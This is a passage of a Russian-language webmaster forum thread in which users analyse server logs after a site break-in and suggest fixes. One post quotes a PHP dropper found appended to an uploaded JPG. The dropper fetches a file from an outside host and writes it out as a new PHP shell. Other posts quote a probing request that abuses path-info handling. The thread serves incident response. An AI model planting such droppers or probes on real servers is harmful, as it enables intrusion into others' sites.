Что в логах, попытки взлома?

1 23
N
На сайте с 06.05.2007
Offline
419
#21
Обратите внимание на размер ответа - каждый раз разный, чтобы это значило?

При это к картинке foto_107953.jpg дописан код:
Цитата:
<?php^M
$file = file_get_contents('http://lbest-vrn.ru/6666.txt');^M
$brd = fopen('1234567.php','w+');^M
$write = fwrite($brd, $file);^M
?>

Размеры ответа, возможно, зависели от ошибок выдаваемых php.

В файле foto_107953.jpg другой мини-шелл, который скачивает и создает уже php-файл 1234567.php. Может быть таким образом скрипт для дампа базы закачали для большего удобства если предыдущий шелл чем-то не устроил.

95.32.2.11 - - [07/Oct/2011:19:35:12 +0200] "GET /favicon.ico/.php HTTP/1.1" 200 330 "-" "-"

а этот файл проверили? лучше даже во всех картинках сразу код поискать.

Вот засунули вы папку upload в специальный location, но /favicon.ico/.php ведь им не покрывается?

Стоит разобраться почему cgi.fix_pathinfo = 0 не помог.

Проверьте, например с помощью функции phpinfo() из обычного скрипта действительно ли эта настройка отключается. Может быть php.ini используется не тот, который вы правили или что-то еще нужно перезапустить.

Кнопка вызова админа ()
R
На сайте с 22.06.2007
Offline
174
#22
netwind:
а этот файл проверили?

Да, в нем все чисто. Очевидно favicon.ico используют чисто для идентификации уязвимости. Это выгодно делать, потому что такая картинка есть практически на любом сайте.

netwind:
лучше даже во всех картинках сразу код поискать.

а как это сделать, если их десятки тысяч аватарок?

netwind:
Проверьте, например с помощью функции phpinfo() из обычного скрипта действительно ли эта настройка отключается.

Отключается, но не помогает.

N
На сайте с 06.05.2007
Offline
419
#23
Reise:
а как это сделать, если их десятки тысяч аватарок?

ну у вас же наверняка там mc есть. там в меню есть поиск по содержимому файлов.

в первом приближении, как-то так :

find . -type f |xargs grep '<?php'

но этот код не найдет скрипты которые, начинаются с символов <?

R
На сайте с 22.06.2007
Offline
174
#24
netwind:
find . -type f |xargs grep '<?php'

Спасибо за команду, сейчас пройдусь.

1 23

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий